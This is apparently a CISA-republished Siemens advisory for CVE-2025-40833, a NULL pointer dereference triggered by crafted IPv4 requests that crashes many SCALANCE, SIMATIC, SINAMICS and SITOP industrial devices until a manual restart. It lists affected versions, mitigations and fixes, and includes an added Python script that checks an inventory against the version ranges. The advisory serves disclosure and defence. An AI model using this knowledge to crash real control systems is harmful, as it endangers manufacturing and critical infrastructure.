(CVE-2025-40833) SCALANCE WAM766-1 EEC (6GK5766-1GE00-7TA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 EEC (ME) (6GK5766-1GE00-7TC0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 EEC (US) (6GK5766-1GE00-7TB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUB762-1 (6GK5762-1AJ00-1AA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUB762-1 iFeatures (6GK5762-1AJ00-2AA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM763-1 (6GK5763-1AL00-3AA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM763-1 (6GK5763-1AL00-3DA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM763-1 (US) (6GK5763-1AL00-3AB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM763-1 (US) (6GK5763-1AL00-3DB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM766-1 (6GK5766-1GE00-3DA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM766-1 (ME) (6GK5766-1GE00-3DC0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM766-1 (USA) (6GK5766-1GE00-3DB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE X204-2 (6GK5204-2BB10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X204-2FM (6GK5204-2BB11-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X204-2LD (6GK5204-2BC10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X204-2LD TS (6GK5204-2BC10-2CA2) vers:all/* (CVE-2025-40833) SCALANCE X204-2TS (6GK5204-2BB10-2CA2) vers:all/* (CVE-2025-40833) SCALANCE X206-1 (6GK5206-1BB10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X206-1LD (6GK5206-1BC10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X208 (6GK5208-0BA10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X208PRO (6GK5208-0HA10-2AA6) vers:all/* (CVE-2025-40833) SCALANCE X212-2 (6GK5212-2BB00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X212-2LD (6GK5212-2BC00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X216 (6GK5216-0BA00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X224 (6GK5224-0BA00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (230V, coated) (6GK5302-7GD00-3GA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (230V) (6GK5302-7GD00-3EA3) vers:all/* (CVE-2025-40833) SCALANCE 
X302-7 EEC (24V, coated) (6GK5302-7GD00-1GA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (24V) (6GK5302-7GD00-1EA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (2x 230V, coated) (6GK5302-7GD00-4GA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (2x 230V) (6GK5302-7GD00-4EA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (2x 24V, coated) (6GK5302-7GD00-2GA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (2x 24V) (6GK5302-7GD00-2EA3) vers:all/* (CVE-2025-40833) SCALANCE X304-2FE (6GK5304-2BD00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X306-1LD FE (6GK5306-1BF00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (230V, coated) (6GK5307-2FD00-3GA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (230V) (6GK5307-2FD00-3EA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (24V, coated) (6GK5307-2FD00-1GA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (24V) (6GK5307-2FD00-1EA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (2x 230V, coated) (6GK5307-2FD00-4GA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (2x 230V) (6GK5307-2FD00-4EA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (2x 24V, coated) (6GK5307-2FD00-2GA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (2x 24V) (6GK5307-2FD00-2EA3) vers:all/* (CVE-2025-40833) SCALANCE X307-3 (6GK5307-3BL00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X307-3 (6GK5307-3BL10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X307-3LD (6GK5307-3BM00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X307-3LD (6GK5307-3BM10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2 (6GK5308-2FL00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2 RD (inkl. 
SIPLUS variants) vers:all/* (CVE-2025-40833) SCALANCE X308-2LD (6GK5308-2FM00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2LD (6GK5308-2FM10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2LH (6GK5308-2FN00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2LH (6GK5308-2FN10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2LH+ (6GK5308-2FP00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2LH+ (6GK5308-2FP10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2M (6GK5308-2GG00-2AA2) vers:all/* (CVE-2025-40833) SCALANCE X308-2M (6GK5308-2GG10-2AA2) vers:all/* (CVE-2025-40833) SCALANCE X308-2M PoE (6GK5308-2QG00-2AA2) vers:all/* (CVE-2025-40833) SCALANCE X308-2M PoE (6GK5308-2QG10-2AA2) vers:all/* (CVE-2025-40833) SCALANCE X308-2M TS (6GK5308-2GG00-2CA2) vers:all/* (CVE-2025-40833) SCALANCE X308-2M TS (6GK5308-2GG10-2CA2) vers:all/* (CVE-2025-40833) SCALANCE X310 (6GK5310-0FA00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X310 (6GK5310-0FA10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X310FE (6GK5310-0BA00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X310FE (6GK5310-0BA10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X320-1 FE (6GK5320-1BD00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X320-1-2LD FE (6GK5320-3BF00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X408-2 (6GK5408-2FD00-2AA2) vers:all/* (CVE-2025-40833) SCALANCE XF204 (6GK5204-0BA00-2AF2) vers:all/* (CVE-2025-40833) SCALANCE XF204-2 (6GK5204-2BC00-2AF2) vers:all/* (CVE-2025-40833) SCALANCE XF206-1 (6GK5206-1BC00-2AF2) vers:all/* (CVE-2025-40833) SCALANCE XF208 (6GK5208-0BA00-2AF2) vers:all/* (CVE-2025-40833) SCALANCE XM408-4C (6GK5408-4GP00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XM408-4C (L3 int.) (6GK5408-4GQ00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XM408-8C (6GK5408-8GS00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XM408-8C (L3 int.) (6GK5408-8GR00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XM416-4C (6GK5416-4GS00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XM416-4C (L3 int.) 
(6GK5416-4GR00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (230V, ports on front) (6GK5324-0GG00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (230V, ports on front) (6GK5324-0GG10-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (230V, ports on rear) (6GK5324-0GG00-3HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (230V, ports on rear) (6GK5324-0GG10-3HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (24V, ports on front) (6GK5324-0GG00-1AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (24V, ports on front) (6GK5324-0GG10-1AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (24V, ports on rear) (6GK5324-0GG00-1HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (24V, ports on rear) (6GK5324-0GG10-1HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M TS (24V) (6GK5324-0GG00-1CR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M TS (24V) (6GK5324-0GG10-1CR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on front) (6GK5324-4GG00-3ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on front) (6GK5324-4GG10-3ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG00-3JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG10-3JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (24V, ports on front) (6GK5324-4GG00-1ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (24V, ports on front) (6GK5324-4GG10-1ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (24V, ports on rear) (6GK5324-4GG00-1JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (24V, ports on rear) (6GK5324-4GG10-1JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on front) (6GK5324-4GG00-4ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on front) (6GK5324-4GG10-4ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 
100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG00-4JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG10-4JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 24V, ports on front) (6GK5324-4GG00-2ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 24V, ports on front) (6GK5324-4GG10-2ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 24V, ports on rear) (6GK5324-4GG00-2JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 24V, ports on rear) (6GK5324-4GG10-2JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (230V, ports on front) (6GK5324-4QG00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (230V, ports on front) (6GK5324-4QG10-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (230V, ports on rear) (6GK5324-4QG00-3HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (230V, ports on rear) (6GK5324-4QG10-3HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (24V, ports on front) (6GK5324-4QG00-1AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (24V, ports on front) (6GK5324-4QG10-1AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (24V, ports on rear) (6GK5324-4QG00-1HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (24V, ports on rear) (6GK5324-4QG10-1HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE TS (24V, ports on front) (6GK5324-4QG00-1CR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE TS (24V, ports on front) (6GK5324-4QG10-1CR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 1x230V (6GK5524-8GS00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 1x230V (L3 int.) (6GK5524-8GR00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 24V (6GK5524-8GS00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 24V (L3 int.) (6GK5524-8GR00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 2x230V (6GK5524-8GS00-4AR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 2x230V (L3 int.) 
(6GK5524-8GR00-4AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 1x230V (6GK5526-8GS00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 1x230V (L3 int.) (6GK5526-8GR00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 24V (6GK5526-8GS00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 24V (L3 int.) (6GK5526-8GR00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 2x230V (6GK5526-8GS00-4AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 2x230V (L3 int.) (6GK5526-8GR00-4AR2) vers:all/* (CVE-2025-40833) SCALANCE XR528-6M (6GK5528-0AA00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR528-6M (2HR2, L3 int.) (6GK5528-0AR00-2HR2) vers:all/* (CVE-2025-40833) SCALANCE XR528-6M (2HR2) (6GK5528-0AA00-2HR2) vers:all/* (CVE-2025-40833) SCALANCE XR528-6M (L3 int.) (6GK5528-0AR00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR552-12M (6GK5552-0AA00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR552-12M (2HR2, L3 int.) (6GK5552-0AR00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR552-12M (2HR2) (6GK5552-0AA00-2HR2) vers:all/* (CVE-2025-40833) SCALANCE XR552-12M (2HR2) (6GK5552-0AR00-2HR2) vers:all/* (CVE-2025-40833) SIMATIC CFU DIQ (6ES7655-5PX31-1XX0) vers:intdot/<2.0.0 (CVE-2025-40833) SIMATIC CFU PA (6ES7655-5PX11-0XX0) vers:intdot/<2.0.0 (CVE-2025-40833) SIMATIC CFU PA (6ES7655-5PX11-1XX0) vers:intdot/<2.0.0 (CVE-2025-40833) SIMATIC ET 200pro IM 154-8 PN/DP CPU (6ES7154-8AB01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200pro IM 154-8F PN/DP CPU (6ES7154-8FB01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200pro IM 154-8FX PN/DP CPU (6ES7154-8FX00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200S IM 151-8 PN/DP CPU (6ES7151-8AB01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200S IM 151-8F PN/DP CPU (6ES7151-8FB01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0) 
vers:all/* (CVE-2025-40833) SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200SP HA IM155-6 PN vers:intdot/<1.3 (CVE-2025-40833) SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 314C-2 PN/DP (6ES7314-6EH04-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 315-2 PN/DP (6ES7315-2EH14-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 315F-2 PN/DP (6ES7315-2FJ14-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 315T-3 PN/DP (6ES7315-7TJ10-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 317-2 PN/DP (6ES7317-2EK14-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 317F-2 PN/DP (6ES7317-2FK14-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 317T-3 PN/DP (6ES7317-7TK10-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 317TF-3 PN/DP (6ES7317-7UL10-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 319-3 PN/DP (6ES7318-3EL01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 319F-3 PN/DP (6ES7318-3FL01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 CPU 412-2 PN V7 (6ES7412-2EK07-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 CPU 414-3 PN/DP V7 (6ES7414-3EM07-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 CPU 414F-3 PN/DP V7 (6ES7414-3FM07-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 CPU 416-3 PN/DP V7 (6ES7416-3ES07-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 CPU 416F-3 PN/DP V7 (6ES7416-3FS07-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 H V6 CPU family (incl. 
SIPLUS variants) vers:all/* (CVE-2025-40833) SIMATIC S7-410 V10 CPU family (incl. SIPLUS variants) vers:intdot/<10.2 (CVE-2025-40833) SIMATIC S7-410 V8 CPU family (incl. SIPLUS variants) vers:intdot/<8.3 (CVE-2025-40833) SIMIT UNIT V10 vers:all/* (CVE-2025-40833) SIMIT UNIT V11 vers:all/* (CVE-2025-40833) SINAMICS CBE20 vers:all/* (CVE-2025-40833) SINAMICS G115D vers:all/* (CVE-2025-40833) SINAMICS G120 (incl. SIPLUS variants) vers:all/* (CVE-2025-40833) SINAMICS G120C vers:all/* (CVE-2025-40833) SINAMICS G120D vers:all/* (CVE-2025-40833) SINAMICS G120X vers:all/* (CVE-2025-40833) SINAMICS G120XA vers:all/* (CVE-2025-40833) SINAMICS G130 vers:all/* (CVE-2025-40833) SINAMICS G150 vers:all/* (CVE-2025-40833) SINAMICS S110 vers:all/* (CVE-2025-40833) SINAMICS S120 (incl. SIPLUS variants) vers:all/* (CVE-2025-40833) SINAMICS S150 vers:all/* (CVE-2025-40833) SINUMERIK 840D sl vers:all/* (CVE-2025-40833) SIPLUS ET 200S IM 151-8 PN/DP CPU (6AG1151-8AB01-7AB0) vers:all/* (CVE-2025-40833) SIPLUS ET 200S IM 151-8F PN/DP CPU (6AG1151-8FB01-2AB0) vers:all/* (CVE-2025-40833) SIPLUS NET IE/PB link PN IO (6AG1411-5AB10-2AA0) vers:all/* (CVE-2025-40833) SIPLUS S7-300 CPU 314C-2 PN/DP (6AG1314-6EH04-7AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-300 CPU 315-2 PN/DP (6AG1315-2EH14-7AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-300 CPU 315F-2 PN/DP (6AG1315-2FJ14-2AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-300 CPU 317-2 PN/DP (6AG1317-2EK14-7AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-300 CPU 317F-2 PN/DP (6AG1317-2FK14-2AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-400 CPU 414-3 PN/DP V7 (6AG1414-3EM07-7AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-400 CPU 416-3 PN/DP V7 (6AG1416-3ES07-7AB0) vers:all/* (CVE-2025-40833) SITOP PSU8600 1AC 20 A/4x5 A PN (6EP3336-8MB00-2CY0) vers:all/* (CVE-2025-40833) SITOP PSU8600 3AC 20 A PN (6EP3436-8SB00-2AY0) vers:all/* (CVE-2025-40833) SITOP PSU8600 3AC 20 A/4x5 A PN (6EP3436-8MB00-2CY0) vers:all/* (CVE-2025-40833) SITOP PSU8600 3AC 40 A PN 
(6EP3437-8SB00-2AY0) vers:all/* (CVE-2025-40833) SITOP PSU8600 3AC 40 A/4x10 A PN (6EP3437-8MB00-2CY0) vers:all/* (CVE-2025-40833) SITOP PSU8600 3AC 40 A/4x10A EIP (6EP3437-8MB10-2CY0) vers:all/* (CVE-2025-40833) SITOP UPS1600 10 A Ethernet/ PROFINET (6EP4134-3AB00-2AY0) vers:all/* (CVE-2025-40833) SITOP UPS1600 20 A Ethernet/ PROFINET (6EP4136-3AB00-2AY0) vers:all/* (CVE-2025-40833) SITOP UPS1600 40 A Ethernet/ PROFINET (6EP4137-3AB00-2AY0) vers:all/* (CVE-2025-40833) SITOP UPS1600 EX 20 A Ethernet PROFINET (6EP4136-3AC00-2AY0) vers:all/* (CVE-2025-40833)

CVSS v3: 7.5
Vendor: Siemens
Equipment: Siemens Industrial Devices
Vulnerabilities: NULL Pointer Dereference

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities
CVE-2025-40833: The affected devices contain a NULL pointer dereference vulnerability that is triggered while processing specially crafted IPv4 requests. This could allow an attacker to cause a denial-of-service condition. A manual restart is required to recover the system.
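The affected-product entries above are written in the package-url VERS range notation (vers:intdot/<3.2.0, vers:all/*). The following is an added example, not Siemens or CISA code, that parses entries in that notation and checks a constructed device inventory against them so a defender can tell which units still need the vendor fix; it handles only the single-constraint and wildcard ranges this advisory uses (the full VERS interval algorithm is not implemented), and the inventory article numbers and firmware versions are sample values.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Entry format as it appears in the advisory:
#   "<product name> (<article number>) vers:<scheme>/<range> (<CVE>)"
ENTRY_RE = re.compile(
    r"^(?P<product>.+?) vers:(?P<scheme>[a-z]+)/(?P<range>\S+) \((?P<cve>CVE-\d{4}-\d+)\)$"
)
# Trailing Siemens article number (MLFB), e.g. "(6GK5766-1GE00-3DC0)"; entries such as
# "(incl. SIPLUS variants)" do not start with a digit and are left as part of the name.
ARTICLE_RE = re.compile(r"\((?P<mlfb>\d[A-Z0-9-]+)\)$")
CONSTRAINT_RE = re.compile(r"^(?P<op><=|>=|!=|<|>|=)?(?P<ver>[0-9.]+)$")


@dataclass(frozen=True)
class AffectedProduct:
    name: str               # product name without the trailing article number
    article: Optional[str]  # article number (MLFB) if the entry carries one
    scheme: str             # "intdot" or "all"
    version_range: str      # e.g. "<3.2.0" or "*"
    cve: str


def parse_entry(line: str) -> AffectedProduct:
    """Parse one affected-product line from the advisory list."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised entry: {line!r}")
    product = m.group("product")
    art = ARTICLE_RE.search(product)
    article = art.group("mlfb") if art else None
    name = product[: art.start()].rstrip() if art else product
    return AffectedProduct(name, article, m.group("scheme"), m.group("range"), m.group("cve"))


def intdot(version: str) -> Tuple[int, ...]:
    """'intdot' scheme: dot-separated integers; '3.2', 'V3.2' and '3.2.0' compare equal."""
    parts = tuple(int(p) for p in version.strip().lstrip("vV").split("."))
    while len(parts) > 1 and parts[-1] == 0:   # drop trailing zeros for comparison
        parts = parts[:-1]
    return parts


def satisfies(version: str, constraint: str) -> bool:
    """Evaluate a single VERS constraint ('<3.2.0', '>=2', '=1.3', '*') for intdot versions."""
    if constraint == "*":
        return True
    m = CONSTRAINT_RE.match(constraint)
    if not m:
        raise ValueError(f"unsupported constraint: {constraint!r}")
    op = m.group("op") or "="
    have, want = intdot(version), intdot(m.group("ver"))
    return {
        "<": have < want, "<=": have <= want, ">": have > want,
        ">=": have >= want, "=": have == want, "!=": have != want,
    }[op]


def is_affected(entry: AffectedProduct, installed_version: Optional[str]) -> bool:
    """True if the installed version falls inside the entry's affected range.

    Simplification (assumption): the ranges on this page are '*' or one constraint, so
    '|'-separated constraints are AND-ed instead of treated as VERS interval sequences.
    """
    if entry.scheme == "all" or entry.version_range == "*":
        return True   # vers:all/*: every version is affected (no fix planned)
    if installed_version is None:
        return True   # unknown firmware on a listed product: treat as affected
    return all(satisfies(installed_version, c) for c in entry.version_range.split("|"))


def check_inventory(entries: List[AffectedProduct],
                    inventory: List[Tuple[str, Optional[str]]]) -> List[Tuple[str, Optional[str], str]]:
    """Return (article, version, cve) for every inventory device the advisory covers."""
    by_article = {e.article: e for e in entries if e.article}
    hits = []
    for article, version in inventory:
        entry = by_article.get(article)
        if entry and is_affected(entry, version):
            hits.append((article, version, entry.cve))
    return hits


# Constructed sample: four entries in the advisory's own notation plus a made-up inventory.
SAMPLE_ENTRIES = [
    "SCALANCE WUM766-1 (ME) (6GK5766-1GE00-3DC0) vers:intdot/<3.2.0 (CVE-2025-40833)",
    "SCALANCE X208 (6GK5208-0BA10-2AA3) vers:all/* (CVE-2025-40833)",
    "SIMATIC CFU PA (6ES7655-5PX11-1XX0) vers:intdot/<2.0.0 (CVE-2025-40833)",
    "SIMATIC S7-410 V10 CPU family (incl. SIPLUS variants) vers:intdot/<10.2 (CVE-2025-40833)",
]
SAMPLE_INVENTORY = [                 # (article number, firmware version), constructed
    ("6GK5766-1GE00-3DC0", "V3.1.2"),  # below the V3.2.0 fix: affected
    ("6GK5766-1GE00-3DC0", "3.2.0"),   # at the fixed version: not affected
    ("6GK5208-0BA10-2AA3", "5.2.6"),   # vers:all/*: affected at any version
    ("6ES7655-5PX11-1XX0", "2.0"),     # 2.0 == 2.0.0: not affected
    ("6ES7655-5PX11-1XX0", None),      # firmware unknown: reported as affected
]


def demo() -> List[Tuple[str, Optional[str], str]]:
    entries = [parse_entry(e) for e in SAMPLE_ENTRIES]
    return check_inventory(entries, SAMPLE_INVENTORY)


if __name__ == "__main__":
    for article, version, cve in demo():
        print(f"{article} firmware {version}: affected by {cve}")
```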
View CVE Details

Affected Products
Siemens Industrial Devices
Vendor: Siemens
Product Version: as listed above
Product Status: known_affected

Remediations
Mitigation: As a mitigation, disable the Ethernet ports on the CPU and use a communication module (such as a CP) for communication instead.
Mitigation: Restrict access to the affected systems to trusted IP addresses only.
No fix planned: Currently no fix is planned.
None available: Currently no fix is available.
Vendor fix: Update to V10.2 or later version. https://support.industry.siemens.com/cs/ww/en/view/109773044/
Vendor fix: Update to V2.0.0 or later version. https://support.industry.siemens.com/cs/ww/en/view/109781049/
Vendor fix: Update to V2.0.0 or later version. https://support.industry.siemens.com/cs/ww/en/view/109754628/
Vendor fix: Update to V3.2.0 or later version. https://support.industry.siemens.com/cs/ww/en/view/109992747/
Vendor fix: Update to V6.6.0 or later version. https://support.industry.siemens.com/cs/ww/en/view/109996102/
Vendor fix: Update to V8.3 or later version. https://support.industry.siemens.com/cs/ww/en/view/109476571/
Vendor fix: Update to V8.3 or later version. https://support.industry.siemens.com/cs/ww/en/view/109989310/
Vendor fix: Update to V1.3 or later version.
Vendor fix: https://support.industry.siemens.com/cs/ww/en/view/1029552/

Relevant CWE: CWE-476 NULL Pointer Dereference

Metrics
CVSS Version: 3.1
Base Score: 7.5
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Acknowledgments
Siemens ProductCERT reported this vulnerability to CISA.

General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.
Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

